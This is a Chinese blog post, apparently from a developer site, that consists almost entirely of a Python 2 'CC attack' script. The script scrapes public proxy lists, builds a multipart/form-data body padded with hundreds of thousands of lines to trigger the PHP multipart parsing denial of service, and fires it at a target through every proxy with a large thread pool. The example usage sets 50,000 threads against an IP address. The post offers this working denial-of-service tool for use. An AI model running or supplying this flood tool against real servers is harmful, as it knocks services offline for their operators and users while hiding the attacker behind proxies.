python脚本模拟CC攻击

#!/usr/bin/env python
# Author: scott
# coding:utf-8

#适用于python2

if __name__ == '__main__':
    #unittest.main()
    pass

import sys
import urllib
import urllib2
import datetime
import re
import os
import threading
import time
import random
from optparse import OptionParser
from multiprocessing import Pool
import string
import random

#----------------------------------------------------------------------
def generate_string(stat, length):
    """(str,int)->str
    generate string as required."""
    stat_final = ''
    if 'u' in str(stat).lower():
        stat_final += string.ascii_uppercase
    if 'l' in str(stat).lower():
        stat_final += string.ascii_lowercase
    if 'd' in str(stat).lower():
        stat_final += string.digits
    return ''.join(random.SystemRandom().choice(stat_final) for _ in range(int(length)))

def check_php_multipartform_dos(url, post_body, headers, ip):
    try:
        proxy_handler = urllib2.ProxyHandler({"http": ip})
        null_proxy_handler = urllib2.ProxyHandler({})
        opener = urllib2.build_opener(proxy_handler)
        urllib2.install_opener(opener)
        req = urllib2.Request(url)
        for key in headers.keys():
            req.add_header(key, headers[key])
        starttime = datetime.datetime.now()
        fd = urllib2.urlopen(req, post_body)
        html = fd.read()
        endtime = datetime.datetime.now()
        usetime = (endtime - starttime).seconds
        if(usetime > 5):
            result = url + " is vulnerable"
        else:
            if(usetime > 3):
                result = "need to check normal respond time"
        return [result, usetime]
    except KeyboardInterrupt:
        exit()

def get_stock_html(URL):
        opener = urllib2.build_opener(
            urllib2.HTTPRedirectHandler(),
            urllib2.HTTPHandler(debuglevel=0),
        )
        opener.addheaders = [
            ('User-agent',
             'Mozilla/4.0 (compatible;MSIE 7.0;'
             'Windows NT 5.1; .NET CLR 2.0.50727;'
             '.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
        ]
        url = "http://proxy.com.ru/%s" % URL
        response = opener.open(url)
        return ''.join(response.readlines())

def Getting_Url():
        global CC_Url
        file = open('url', 'r')
        CC_Url = file.readlines()
        file.close()

def Getting_list():
        global IP_Port
        IP_Port = []
        for html_list in re.findall('list_\d+.html', get_stock_html("list_1.html")):
                print "getting %s's IP:PORT" % html_list
                IP_Port += eval(re.sub('</td><td>', ':', "%s" %
                                re.findall('\d+.\d+.\d+.\d+<\/td><td>\d+', get_stock_html(html_list))))
def main():
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                      dest="target",
                      default=False,
                      type="string",
                      help="test target")
    parser.add_option("-x", "--thread", action="store",
                      dest="thread",
                      default=250,
                      type="int",
                      help="thread")
    parser.add_option("-r", "--request_num", action="store",
                      dest="request_num",
                      default= 350000,
                      type="int",
                      help="thread")
    (options, args) = parser.parse_args()
    if options.target:
        target = options.target
        thread = options.thread
        request_num = options.request_num
    else:
        return
    Num = request_num
    random_boundary = generate_string('ulr', 16)
    headers = {
        'Content-Type':
        'multipart/form-data; boundary=----WebKitFormBoundary{random_boundary}'.format(random_boundary = random_boundary),
        'Accept-Encoding': 'gzip, deflate',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = "------WebKitFormBoundary{random_boundary}\nContent-Disposition: form-data; name=\"file\"; filename={random_name}.jpg".format(random_boundary = random_boundary, random_name = generate_string('ulr', 8))
    payload = ""
    for i in range(0, Num):
        payload = payload + "a\n"
    body = body + payload
    body = body + \
        "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------{random_boundary}".format(random_boundary = random_boundary)
    print "starting..."
    try:
        Getting_list()
        print('PROXY LIST READY')
        pool = Pool(int(thread))
        for ip in IP_Port:
            pool.apply_async(
                check_php_multipartform_dos,
                [target,
                 body,
                 headers,
                 ip])
        pool.close()
        pool.join()
    except KeyboardInterrupt:
        print('EXIT')
        exit()

if __name__ == "__main__":
    main()
    exit()

#Example :
#python cc.py -t 10.12.237.69 -x 50000 -r "350000"
#-t:目标;-x:线程;-r:请求数。    

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小数苗小数苗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值